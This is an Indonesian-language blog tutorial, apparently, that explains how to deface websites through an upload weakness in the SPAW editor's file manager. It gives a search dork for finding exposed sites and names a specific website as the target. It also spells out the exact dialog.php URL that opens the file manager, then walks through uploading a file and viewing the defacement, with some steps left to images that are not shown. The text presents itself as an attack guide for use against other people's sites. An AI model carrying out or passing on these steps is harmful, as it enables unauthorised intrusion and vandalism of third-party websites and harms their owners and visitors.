Deface Website Dengan Spaw Uploads Vulnerability

1) Carilah Website target
        Dork : inurl:”spaw2/uploads/files/”
     Pilih salah satu website, dalam tutorial ini saya memilih
     website http://www.wholehealthamerica.com

2) Buka website yang kalian pilih tadi
   
     Ganti bagian /spaw2/uploads/ menjadi kode dibahaw ini

spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da7
2d98cac9&type=files




     Contoh url yang sudah diganti dengan kode diatas :

http://www.wholehealthamerica.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da7
2d98cac9&type=files

3) Tekan Enter untuk membuka Websitenya
    Ini tampilan Website yang telah diganti kodenya


4) Untuk nomer 4 silahkan lihat gambar ^_^



5) Jika proses Upload berhasil, maka akan ada daftar file dan diantaranya adalah file kalian


6) Dibawah ini adalah penampakan deface kalian ^_^




./ Greetz :
- I D C A -

Leave a Reply


[ PLAYGROUND ]

Indonesian Coder || Codenesia || Exploit Database || Exploit ID || HN Community || devilzc0de || Packet Storm || cxsecurity